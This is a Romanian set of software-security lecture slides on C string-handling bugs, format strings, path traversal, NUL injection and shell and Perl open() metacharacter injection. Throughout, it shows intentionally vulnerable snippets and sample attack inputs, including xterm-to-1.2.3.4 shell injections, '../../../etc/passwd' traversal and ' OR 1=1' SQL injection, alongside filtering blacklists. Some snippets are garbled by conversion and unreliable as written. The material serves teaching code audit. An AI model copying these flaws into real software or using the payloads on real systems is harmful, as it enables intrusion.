#### Securitate Software

# IV. Vulnerabilități în utilizarea și manipularea șirurilor de caractere

#### Objective

- aspecte de securitate legat de cod ce manipulează șiruri de caractere
- prezentarea unor vulnerabilități ce rezulta din manipulearea metacaracterelor
  - C format string
  - shell metacharacter injection

#### Continut

- Manipularea sirurilor in C
  - Unbounded String Functions
  - Bounded String Functions
  - Probleme comune
- Metacaractere
  - Delimitatori
  - NUL character injection
  - Trunchiere
- Formate comune pentru metacaractere
  - Metacaractere pentru cai
  - C Format Strings
  - Functia Perl open()
- Filtrarea metacaracterelor
  - Evitarea metacaracterelor

### Şiruri în C

- nu exista un tip de dată dedicat șirurilor de caractere
- vectori de caractere terminați cu NUL
- necesită procesarea manuală
  - alocare statică (dimensiunea maximă)
  - alocare dinamică (administrare greoaie)
- C++ ofera suport pentru șiruri
  - ▶ conversia între șiruri C++ și șiruri C necesită uneori folosirea de API C

# Funcții C pentru șiruri care nu verifică limita sirurilor - descriere și probleme

- manipularea şirurilor
- nu se ia în considerare dimensiunea buffer-ului destinație
- poate duce la buffer overflow
- code audit
  - ▶ analizați toate căile de execuție pentru funcții nesigure
  - determinați dacă astfel de funcții pot fi apelate în cazul în care dimensiunea sursei este mai mare decât destinația

#### Funcții "scanf"

- folosită pentru citire (fișier, string)
- fiecare element specificat în format string e stocat într-un argument
- când se folosește "%s", vectorul care stochează șirul citit trebuie să fie destul de mare pentru a putea memora tot șirul
- aparțin API libc (UNIX și Windows)
- funcții similare: \_tscanf, wscanf, sscanf, fscanf, fwscanf, \_snscanf, \_snwscanf

# Funcții "scanf" (II)

exemplu cod vulnerabil

```
int read_ident(int sockfd){
    char buffer[1024];
    int sport, cport;
    char user[32], rtype[32], addinfo[32];
    if (read(sockfd, buffer, sizeof(buffer)) <= 0) {</pre>
      perror ("cannot_read");
      return -1;
    buffer[sizeof(buffer) -1] = '\0';
    sscanf(buffer, "%d:%d:%s:%s:%s", &sport, &cport,
        rtype, user, addinfo);
```

#### Funcții "sprintf"

- atunci când buffer-ul destinație are dimensiunea mai mică decât datele de intrare poate apărea o vulnerabilitate buffer overflow
- vulnerabilitățile se datorează în principal șirurilor de intrare de dimensiune mare, șiruri care folosesc specificatorul "%s"
- aparțin API libc (UNIX și Windows)
- funcții similare: \_stprintf, \_sprintf, \_vsprintf, vsprintf, swprintf, vswprintf, \_vswprintfA, \_wsprintfW

# Funcții "sprintf" (II)

- exemplu cod vulnerabil
- exemplu luat din modulul Apache JRUN

```
static void WriteToLog(jrun_request *r, const char *
    szFormat, ...) {
  va_list list;
  char szBuf[2048];

  strcpy(szBuf, r->StringRep);
  va_start();
  vsprintf(strchr(szBuf, '\0'), szFormat, list); //!!!
  va_end();
}
```

#### Funcții "strcpy"

- "faimoasă" datorită numeroaselor vulnerabilități bazate pe această familie de funcții
- o copiază în destinație conținutul sursei până la caracterul NUL
- dacă buffer-ul destinație este mai mic decât sursa apare o vulnerabilitate buffer overflow
- aparțin API libc (UNIX și Windows)
- funcții similare: \_tcscpy, lstrcpyA, wcscpy, \_mbscpy

# Funcții "strcpy" (II)

exemplu cod vulnerabil

```
char buffer [1024], username [32]; 
 n = read(sockfd, buffer, sizeof(buffer) - 1)); 
 buffer[n] = 0; 
 strcpy(username, buffer); //!!!
```

#### Funcții "strcat"

- similar cu strcpy
- aparțin API libc (UNIX și Windows)
- funcții similare: \_tcscat, wcscat, \_mbscat

# Funcții "strcat" (II)

exemplu cod vulnerabil

```
int process_email(char *email) {
        char username[32], domain[128], *delim;
    int c;
    ...
    strcpy(domain, delim);
    if(!strchr(delim, '.'))
        strcat(domain, default_domain); //!!!
```

# Funcții C pentru șiruri care verifică limita șirurilor - descriere și probleme

- conceput pentru a oferi programatorilor o alternativă mai sigură la funcțiile care nu verifică limita șirurilor
- argument ce specifică lungimea maximă
- vulnerabilitățile apar datorită utilizării eronate a argumentului lungime
  - neatenție
  - ▶ input greșit
  - ▶ eroare la calculul lungimii
  - erori aritmetice
  - conversie între tipuri de date

#### Funcții "snprintf"

- înlocuitor pentru sprintf
- aparțin API libc (UNIX și Windows)
- funcții similare: \_sntprintf, \_snprintf, \_vsnprintf, vsnprintf, \_snwprintf
- versiuni mai sigure (Windows): \_snprintf\_s, \_snwprintf\_s
- funcționalitate diferită sub Windows și Linux când se atinge limita
  - ▶ Windows: se intoarce −1 iar șirul nu se termină cu NUL
  - UNIX: șirul se termină cu NUL și întoarce numărul de octeți ce ar fi fost scriși dacă ar fi fost destul loc
  - ▶ **Observație** (MSDN): începând cu UCRT în Visual Studio 2015 și Windows 10 funcțiile snprintf și \_snprintf nu mai sunt identice
    - ★ snprintf respectă standardul C99

# Funcții "snprintf" (II)

exemplu cod vulnerabil (aplicație Windows ce tratează șiruri în mod UNIX)

```
int log(int fd, char *fmt, ...) {
 char buf [4096];
 va list ap:
 va_start(ap, fmt);
 n = vsnprintf(buf, sizeof(buf), fmt, ap); //!!!
  if (n > sizeof(buf) - 2) //!!!
    buf[sizeof(buf) - 2] = 0; //!!!
  strcat(buf, "\n"); //!!!
 va end(ap);
 write_log(fd, buf, strlen(buf));
```

#### Funcții "strncpy"

- alternativa "sigură" la strcpy
- primește numărul maxim de octeți ce trebuie copiați în destinație
- aparțin API libc (UNIX și Windows)
- funcții similare: \_tcsncpy, \_csncpy, wcscpyn, \_mbsncpy
- versiuni mai sigure (Windows): strncpy\_s, wcsncpy\_s
- nu garantează terminarea șirului destinație cu NUL în cazul în care lungimea șirului sursă este mai mare decât valoarea permisă
- folosirea unui șir care nu se termina cu NUL poate fi o vulnerabilitate

# Funcții "strncpy" (II)

exemplu cod vulnerabil

```
int is_username_valid(char *username) {
  delim = strchr(user_name, ':');
  if (delim)
    *delim = ' \setminus 0';
int authenticate(char *user_input) {
  char user [1024];
  strncpy(user, user_input, sizeof(user)); //!!!
  if (!is username valid(user))
    goto fail;
```

#### Funcții "strncat"

- alternativa sigură la strcat
- aparțin API libc (UNIX și Windows)
- funcții similare: \_tcsncat, wcsncat, \_mbsncat
- aspecte neînțelese: parametrul size indică cât va fi copiat în buffer nu dimensinea totala
- exemplu cod vulnerabil (se specifică dimensiunea totala pentru buf)

```
int copy_data (char *username) {
  strcpy(buf, "username_is:=");
  strncat(buf, username, sizeof(buf)); //!!!
  log("%s\n", buf);
  return 0;
}
```

# Funcții "strncat" (II)

- parametrul size nu ține cont de caracterul NUL de la sfârșitul șirului, care este adaugat
- exemplu cod vulnerabil (off-by-one error)

```
int copy_data (char *username) {
  strcpy(buf, "username_is:=");
  strncat(buf, username, sizeof(buf)—strlen(buf));
  log("%s\n", buf);
  return 0;
}
```

• când parametrul *size* este dedus dintr-o formula trebuie avut în vedere erori de tipul *integer overflow / underflow* 

```
sizeof(buf) - strlen(buf) - 1
```

## Funcții "strlcpy"

- reprezintă o extensie BSD la API *libc*, remediind deficiențele *strncpy* 
  - ▶ garantează terminarea șirului destinație cu NUL
- nu este așa des folosită datorită problemelor de portabilitate
- aparține API libc (BSD)
- code audit: dimensiunea întoarsă este lungimea șirului sursă, care poate fi mai mare decât dimensiunea șirului destinație

# Funcții "strlcpy" (II)

exemplu cod vulnerabil

```
int qualify_username (char *username) {
  char buf[1024];
  size_t len;

len = strlcpy(buf, username, sizeof(buf));
  strncat(buf, "@127.0.0.1", sizeof(buf) - len);
}
```

#### Funcții "strlcat"

- reprezintă o extensie BSD la API libc, remediind deficiențele strncat
  - garantează terminarea șirului destinație cu NUL
  - parametrul size este dimensiunea totala a şirului destinație, nu spațiul rămas (strncat)
- întoarce numărul total de octeți necesari pentru a crea șirul destinație (dimensiunea șir *destinație* + dimensiunea șir *sursă*)

#### Unbounded copies

exemplu cod vulnerabil

```
if (recipient == NULL) &&
    Ustrcmp(errmess, "empty_address") != 0) {
  uschar hname [64];
  uschar *t = h \rightarrow text:
  uschar *tt = hname;
  uschar *verb = US"is";
  int len;
  while (*t != ':')
    *tt++ = *t++;
 *tt = 0:
```

#### Character expansion

- apare atunci când programele codifică caractere speciale, șirul rezultat este mai lung decât cel inițial
- des întâlnit la metacaractere și la formatarea datelor pentru a le face inteligibile (human readable)
- exemplu: pentru fiecare caracter special din src sunt scrişi doi octeți în destinație

```
int write_log (int fd, char *data, size_t len) {
 char buf[1024], *src, *dst;
  if (strlen(data) >= sizeof(buf))
    return -1:
  for (src = data, dst = buf; *src; src++) {
    if (!isprint(*src)) {
      sprintf(dst, "\%02x", *src);
      dst += strlen(dst);
   else
   *dst++=*src:
```

#### Pointeri ce cresc greșit

- în cazul în care pointerii cresc peste limita șirului pe care operează:
  - şirul nu se termina cu NUL (rezultatul strncpy)
  - șirul era formatat corect (se termina cu NUL) dar se sare peste caracterul NUL
- ex 1: vulnerabil deoarece nu ține cont de faptul ca buf poate să nu se termine cu NUL

```
int process_email(char *emal) {
  char buf[1024], *domain;
  strncpy(buf, email, sizeof(buf));
  if ((domain = strchr(buf, '@')) == NULL)
    return -1;
  *domain++ = '\0';
  ...
}
```

### Pointeri ce cresc greșit (II)

 ex 2: vulnerabil deoarece nu ține cont de faptul ca read nu termină buf cu NUL

```
char username[256], netbuf[256], *ptr;
read(sockfd, netbuf, sizeof(netbuf));
ptr = strchr(netbuf, ':');
if (ptr)
  *ptr++ = '\0';
strcpy(username, netbuf);
```

• ex 3: vulnerabil deoarece nu verifică dacă șirul se termină cu NUL

```
for (ptr = src; *ptr != '@'; ptr++);
```

• ex 4: variație pe exemplul 3

```
for (ptr = src; *ptr && *ptr != '@'; ptr++);
ptr++;
```

### Pointeri ce cresc greșit (III)

- când programul face presupuneri asupra conținutului șirului prelucrat, atacatorul poate manipula programul
- ex 5: vulnerabil deoarece programul nu verifică dacă datele respenctă formatul prelucrat

```
for (i = j = 0; str[i]; i++, j++)
  if (str[i] == '%') {
    str[j] = decode (str[i+1], str[i+2]);
    i += 2;
  } else
    str[j] = str[i];
```

#### Greșeli simple

- cu cât textul prelucrat este mai complex cu atât este mai probabil ca programatorul să facă greșeli
- o greșeală comună este folosirea incorectă a variabilelor pointer, dereferențiere greșită sau deloc
- exemplu cod vulnerabil

```
while (quoted && *cp != ' \setminus 0')
  if (is_qtext((int) *cp) > 0)
    cp++:
  else if (is_quoted_pair(cp) > 0)
    cp += 2:
int is_quoted_pair (char *s) {
  int res = -1;
  int c:
  if (((s+1) != NULL) \&\& (*s == '\\')) {
    c = (int) *(s+1);
    if (ap_isascii(c))
      res = 1:
  return res:
```

#### Metacaractere - descriere

- metadate = informație care descrie sau argumentează datele principale
  - ex. formatul de afișare
- reprezentare în interiorul textului (in-band reprezentation)
  - ▶ metadatele incorporate în date
  - realizat prin caractere speciale (metacaractere)
  - exemple: şir terminat cu NUL in C, '/' în calea unui fişier, '.' în numele unei maşini (adr. IP), '@' dintr-o adresa e-mail, etc.
  - avantaje: scriere compactă, text mai lizibil
  - dezavantaje: probleme de securitate prin suprapunere (date si metadate puse în acelasi context)
- reprezentare separată (out-of-band reprezentation)
  - metadatele sunt separate de date
  - exemple: tipuri de şiruri in C++, Java, etc.
- problemele de securitate apar când datele de intrare conțin metacaractere care nu au fost corect filtrate

#### Delimitatori

- vulnerabilități apar dacă
  - atacatorul poate introduce (în plus) caractere ce au rolul de delimitator
  - ▶ datele de intrare nu sunt filtrate
- $\Longrightarrow$  injected delimiter attacks
- exemplu cod vulnerabil (datele nu sunt filtrate)
  - fie un format predefinit "username:password", caracterele ':' și '\n' sunt folosite pe post de delimitatori
  - dacă un utilizator bob ar putea furniza o parola sub forma "pass\natacator:pass\_atacator\n"
  - fișierul care memorează utilizatorii și parolele ar arăta bob:pass atacator:pass\_atacator
- code audit: cautați șabloanele prin care aplicația preia date de intrare (ca șir formatat) fără a le filtra
- second order injection: stochează datele de intrare și le interpretează mai târziu

#### Exemplu cod vulnerabil

```
use CGI;
$new password = $query->param('password');
open(IFH, "</opt/passwords.txt") || die("$!");
open(OFH, ">/opt/passwords.txt.tmp") || die("$!");
while(<IFH>){
  (\$user, \$pass) = split /:/;
  if($user ne $session username)
    print OFH "$user:$pass\n";
  else
    print OFH "$user:$new password\n"; //!!!
close (IFH);
close (OFH);
```

#### Code Review

- 1 identificați codul care tratează șiruri ce conțin metacaractere
- identificați caracterele cu rol de delimitator
- o identificați și verificați dacă se face filtrare pe datele de intrare
- ⇒ orice caracter cu rol special nefiltrat poate duce la vulnerabilități

#### NUL character injection

- apare datorită diferențelor dintre C și alte limbaje de nivel înalt în tratarea șirurilor
- caracterul NUL poate sa nu aiba semnificație speciala în alte limbaje de nivel înalt, dar aceste limbaje pot folosi API C, pasând acestor API caracterul NUL
- vulnerabilitatea NUL byte injection este o problemă care nu depinde de tehnologia folosită, în final interacțiunea este cu sistemul de operare
- o vulnerabilitate apare atunci când un atacator poate include un caracter NUL intr-un șir de caractere, șir care va fi tratat mai târziu în modul C
- inserând un caracter NUL atacatorul poate trunchia șiruri tratate în modul C

#### Exemplu cod vulnerabil la "NUL character" injection

ex 1: variabila username nu este filtrată dupa caracterul NULL (ex. "cmd.pl%00)

```
open(FH, ">$username.txt") || die ("$!");
\\ se poate schimba extensia
print FH $data;
close(FH);
```

• ex 2: nu se verifică dacă s-a citit caracterul NUL

# Exemplu cod vulnerabil la "NUL character" injection (II)

• funcția gets nu se oprește la caracterul NUL

```
if (fgets(buf, sizeof(buf), fp) != NULL) buf[strlen(buf)-1] = '\0'; // poate scrie inaintea lui buf
```

#### Trunchiere

- reprezintă cazurile în care un șir care depășește în lungime dimensiunea unui buffer este trunchiat
- poate avea efecte vulnerabile
- ex 1: trunchierea unei extensii

```
char buf[64];
int fd;

snprintf(buf, sizeof(buf), "/data/profiles/%s.txt", username);
fd = open(buf, O_WRONLY);
// poate deschide un fisier fara extensia txt
```

 căile către un fișiere sunt cele mai expuse la vulnerabilități de trunchiere

## Trunchiere (II)

- ex 2: vulnerabil datorită limitărilor impuse variabilei username
  - ▶ lungimea cerută poate fi atinsă prin repetarea caracterului "/" ("///") sau prin repetarea caracterelor care indică directorul curent ("./././")

```
char buf[64];
int fd;

snprintf(buf, sizeof(buf), "/data/%s_profile.txt", username);
fd = open(buf, O_WRONLY);
```

## Code audit pentru trunchiere

- verificați funcțiile ce ar putea trunchia șirul rezultat
- înțelegeți comportamentul
  - buffer-ul destinație este umplut?
  - buffer-ul destinație se termină cu NULL?
  - buffer-ul destinație este schimbat în cazul unei trunchieri / overflow
  - care este semnificația valorii de retur?
- exemplu GetFullPathName (Windows)
  - intoarce lungimea rezultatului (calea catre fișier) dacă e mai mică decât șirul destinație
  - întoarce numărul de octeți necesari dacă lungimea rezultatului depășește șirul destinație (overflow)
  - ▶ întoarce 0 în caz de eroare

### Formatul metacaracterelor pentru căi - context

- specific resurselor organizate ierarhic
  - ▶ căi pentru fișiere
  - căi pentru regiștrii
- calea este formată din componente aflate în ierarhie, componentele sunt separate prin delimitatori (metacaractere)
- dacă formarea căii se face pe baza datelor introduse de utilizator (date nefiltrate)
  - un atacator poate avea acces la elemente din ierarhie la care nu ar avea permisiuni
  - exemplu: path truncation

#### File canonicalization

- fiecare fișier are o cale unică
- reprezentarea acestei căi nu este unică

```
c:\Windows\system32\calcl.exe
\\?\Windows\system32\calc.exe
c:\Windows\system32\drivers\..\calcl.exe
calc.exe
..\calc.exe
..\calc.exe
```

- file canonicalization = transformarea unei căi în forma sa cea mai simplă
- specific fiecărui sistem de operare (Windows diferit de UNIX)
- cel mai exploatat vector de atac pentru file canonicalization: aplicația nu verifiă dacă se accesează alte fișiere decât cel dorit (directory transversal)
  - bazat pe notația ".."
  - ▶ atacatorii accesează fișiere în afara directorului unde au permisiuni

# File canonicalization (II)

 exemplu cod vulnerabil: nu se verifică variabila username (un atacator poate furniza ca și date de intrare "../../../etc/passwd")

```
use CGI;
...
$username = $query->param('user');
open(FH, "</users/profiles/$username") || die("$!");
print "<B>User_Details_For:_$username</B>BR>BR>";

while (<FH>) {
    print;
    print "<BR>";
}
close(FH);
```

## Windows registry

- funcții Windows pentru manipularea înregistrărilor:
  - RegOpenKey(), RegOpenKeyEx(),
  - RegQueryValue(), RegQueryValueEx(),
  - RegCreateKey(), RegCreateKeyEx(),
  - RegDeleteKey(), RegDeleteKeyEx(), RegDeleteValue()
- vulnerabil la trunchierea căii catre înregistrări
- exemplu cod vulnerabil la trunchiere

```
char buf[MAX_PATH];
snprintf(buf, sizeof(buf), "\\SOFTWARE\\MyProduct\\%s\\subkey2"
    , version);
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buf, 0, KEY_READ, &hKey);
```

- secvențele "/////" sunt reduse la "/"
- cheile sunt deschise în două etape
  - cheia / înregistrarea este deschisă
  - o anumită valoare este manipulată cu ajutorul altor funcții

# Windows registry (II)

- vulnerabl în următoarele situatii:
  - ▶ atacatorul poate manipula direct valoarea cheii / înregistrării
  - ▶ atacatorul vrea să manipuleze chei, nu valorile stocate în chei
  - aplicația folosește un API de nivel înalt ce separă cheia de valorile stocate
  - numele valorii corespunde cu valoarea ce vrea să fie manipulată în altă cheie

## C Format strings

- erori în utilizarea funcțiilor din familia printf, err și syslog
- datele rezultat sunt formatate conform unui parametru (format string), ce conține specificatori de format
- problema: date de intrare nesigure sunt folosite ca și șir de formatare
- dacă un atacator poate furniza anumiți specificatori de format
  - argumentele furnizate nu exista
  - ► -> valorile cerute se vor lua de pe stivă
  - ► > information leakage attack
- specificatorul special "%n"
  - așteaptă ca și argument un pointer de tip int, acesta primește ca și valoare numărul de caractere afișate până acum
  - -> un atacator poate scrie valori arbitrare într-o locație de memorie arbitrară
  - ► -> memory corruption attack

# C Format strings (II)

- code audit
  - ► căutați toate funcțiile ce formatează șiruri și verificați să nu aveți șiruri formatate de utilizator

# C Format strings - vulnerabilități

```
ex 1
int main(int argc, char **argv) {
  if (argc > 1)
    printf(argv[1]);
  return 0;
  • ex 2: syslog formatează suplimentar datele
int log_err(char *fmt, ...) {
  char buf[BUFSIZE];
  va_list ap;
  va_start(ap, fmt);
  vsnprintf(buf, sizeof(buf), fmt, ap);
  va_end(ap);
  syslog(LOG NOTIC, buf);
```

#### Sfaturi

- argumente pentru gcc
  - ► -Wall
  - ► -Wformat, -Wno-format-extra-args
  - ► -Wformat-nonliteral

#### Metacaractere shell

- context
  - aplicații care apelează alte aplicații externe pentru a realiza anumite cerințe
- în general programele sunt rulate în două moduri
  - direct, folosind o funcție execve() sau CreateProcess()
  - indirect, prin linia de comandă (shell) cu funcții precum system() sau popen()
- dacă un utilizator are acces la linia de comandă dintr-un program shell metacharacter injection attack

### Metacaractere shell - exemple cod vulnerabil

 user\_email poate conține metacaractere shell ce vor fi interpretate shell

• date de intrare vulnerabile și comanda shell rezultată

```
/bin/sh -c "/usr/bin/sendmail_-s_"hi"_user@sample.com; 
___xterm_-display_1.2.3.4.:0"
```

#### Code audit

- determinați dacă pot fi executate comenzi arbitrare via shell metacharacter injection
- filtrați caracterele cu interpretare speciala: ';', '|', '&', '<', '>', ''', '!', '\*', '-', '/', '~', etc.
- comportamentul aplicației poate fi controlat prin variabilele system
- verificați cum interpretează datele aplicația care rulează -> second level shell metacharacter injection attack
  - ex. programele e-mail preiau fiecare linie ce incepe cu '~' și o execută în shell

## Functia Perl open() - funcționalitate

- oferă capabilități multiple
  - deschide fisiere și procese
  - modul de deschidere al fișierelor depinde de anumite metacaractere specificate la începutul și sfârșitul numelui fișierului

#### mode characters

- '<' (la început): deschide fișierul pentru citire</p>
- '>' (la început): deschide fișierul petnru scriere, dacă nu există fișierul este creat
- ▶ '+ <' (la început): deschide fișierul pentru citire-scriere
- '+ >' (la început): deschide fișierul pentru citire-scriere, dacă nu există fișierul e creat
- '>>' (la început): deschide un fișierul pentru adăugare
- '+>>' (la început): deschide un fișierul pentru adăugare, dacă nu există fișierul e creat
- '|' (la început): argumentul este o comandă, creează pipe pentru a rula comanda cu drepturi de scriere
- '|' (la sfârșit): argumentul este o comandă, creează pipe pentru a rula comanda cu drepturi de citire

## Exemple de cod vulnerabil

```
ex 1: nume de fișier vulnerabil (ex. '— xterm -d 1.2.3.4:0;')
open(FH, "$username.txt") || die("$!");
ex 2: similar exemplu 1 ('foo; xterm -d 1.2.3.4:0 —;')
open(FH, "/data/profiles/$username.txt") || die("$!");
```

 ex 3: nume de fișier vulnerabil ce ar permite atacatorului sa deschidă și să citească date (ex '>log')

```
open(FH, "+>$username.txt") || die("$!");
```

#### Filtrarea metacaracterelor - eliminarea metacaracterelor

- strategie:
  - respingerea cererilor periculoase
  - eliminarea caracterelor periculoase
- ambele variante implică filtrarea datelor primite de la utilizator, adesea folosind expresii regulare
- eliminarea caracterelor este opțiunea mai riscantă dar și mai robustă
- ex: verifică dacă există caractere ilegale în datele primite

```
if ($input_data =~ /[^a-zA-Z0-9_ ]/) {
   print "Error.uInput_data_contains_illegal_characters!";
   exit;
}
```

# Filtrarea metacaracterelor - eliminarea metacaracterelor (II)

• ex 2: înlocuirea caracterelor ilegale

```
\frac{1}{g} $\input \data =\cap s/\left[\hat{a}-zA-\text{Z0}-9]/g;

    două tipuri de filtrare

      black lists: explicit deny
      white lists: explicit allow (considerat mai restrictiv / sigur)
  ex 3: black list
int islegal(char *input) {
  char *bad_chars = "\"\"\|\|;<>\&-*";
  for (; *input; input++)
     if (strchr(bad_chars, *input))
       return 0:
  return 1;
```

# Filtrarea metacaracterelor - eliminarea metacaracterelor (III)

ex 4: white list

```
int islegal(char *input) {
  for (; *input; input++)
    if (!isalphanum(*input) && *input != '_' && !isspace(*input))
      return 0;
  return 1;
}
```

#### Filtrare insuficientă

• ex: vulnerabil deoarece "\n" nu este filtrat

```
int suspicious (char *s) {
  if (strpbrk(s, ";|&<>''#!?(){}^") != NULL)
    return 1;
  return 0;
}
```

- trebuie să aveți în vedere diferitele implementări / versiuni ale programelor
- exemplu: când folosiți *popen*, datele sunt interpretate de *shell* și abia apoi de programul curent

#### Eliminarea caracterelor

- mai periculos decât respingerea cererilor periculoase, cod expus la erori
- ex 1: vulnerabil datorită unei erori de procesare cu scopul de a elimina
   ".." (pentru secvențe "../../", a doua secvență nu este eliminată)

```
char* clean path(char *input) {
  char *src, *dst;
  for (src = dst = input; *src; )
    if (src[0] = '.' \&\& src[1] = '.' \&\& src[2] = '/') {
      src += 3:
      memmove(dst, src, strlen(src) + 1);
      continue;
    } else
      *dst++=*src++:
  *dst = ' \setminus 0';
  return input;
```

# Eliminarea caracterelor (II)

exd 2: încă vulnerabil la secvențe "....//" char\* clean path(char \*input) { char \*src, \*dst; for (src = dst = input; \*src; ) if (src[0] = '.' && src[1] = '.' && src[2] = '/') { memmove(dst, src+3, strlen(src+3) + 1); continue; } else \*dst++ = \*src++: $*dst = ' \setminus 0'$ ; return input;

## **Escaping Metacharacters**

- metodă non-destructivă
- metodele diferă pentru diferitele formate de date, în general se adaugă un caracter care va invalida metacaracterul ilegal
- exemplu: vulnerabil deoarece caracterul "\" rămâne

```
$username =~ s/\"\'\*/\\$1/g;
$passwd_=~_s/\"\'\*/\\$1/g;
$query_=_"SELECT * FROM users
    WHERE user='"_...$username_.."'
AND pass = '"_...$passwd..."'";
```

• dacă atacatorul furnizează "bob\' OR user =" pentru utilizator și "\' OR 1=1" pentru parolă, rezultatul este

```
SELECT * FROM users
WHERE user='bob\\' OR user =
AND pass = '\\' OR 1=1;
```

#### Evitarea metacaracterelor - descriere

- pot fi folosite caractere codificate pentru a evita mecanismele de filtrare
- dacă se modifică datele de mai multe ori, crește probabilitatea erorilor logice de securitate

#### Codificare hexazecimală

- metode de codificare URI
  - un octet este codificat de caracterul ('%') urmat de doua cifre hexazecimale reprezentând valoarea acelui caracter
  - ▶ pentru Unicode se pot folosi patru octeți precedați de "%u" sau "%U"
- ex 1: vulnerabil pentru date de forma "..%2F..%2Fetc%2Fpassword" ("../../etc/passwd")

```
int open_profile (char *username) {
  if (strchr(username, '/')) { // detectia metacaracterelor
    log ("possible_attack:_slashes_in_username");
    return -1;
}
chdir("/data/profiles");
return open(hexdecode(username), O_RDONLY);
  // codificarea datelor!!!
}
```

## Codificare hexazecimală (II)

- soluția: decodificarea caracterelor ilegale
  - pot să apară probleme când se decodifică greșit caracterele
  - pot să apară probleme când se fac presupuneri despre datele ce urmează dupa caracterul "%"
- ex 2: vulnerabil deoarece se presupune că un număr nu este o literă în intervalul 'a'/'A'-'z'/'Z'

```
int convert_byte (char byte) {
  if (byte \geq 'A' && byte < 'F')
    return (byte - 'A') + 10;
 else if (byte >= 'a' && byte <= 'f'
    return (byte - 'a') + 10:
 else
   return (byte -'0');
int convert_hex (char *string) {
 int val1, val2;
 val1 = convert byte(string[0]);
 val2 = convert_byte(string[1]);
 return (val1 \ll 4) | val2;
```

## Bibliografie

- "The Art of Software Security Assessments", chapter 8, "Strings and Metacharacters", pp. 387 – 458
- 2 "24 Deadly Sins of Software Security", chapter 6, "Format String Problems", Chapter 10, "Command Injection".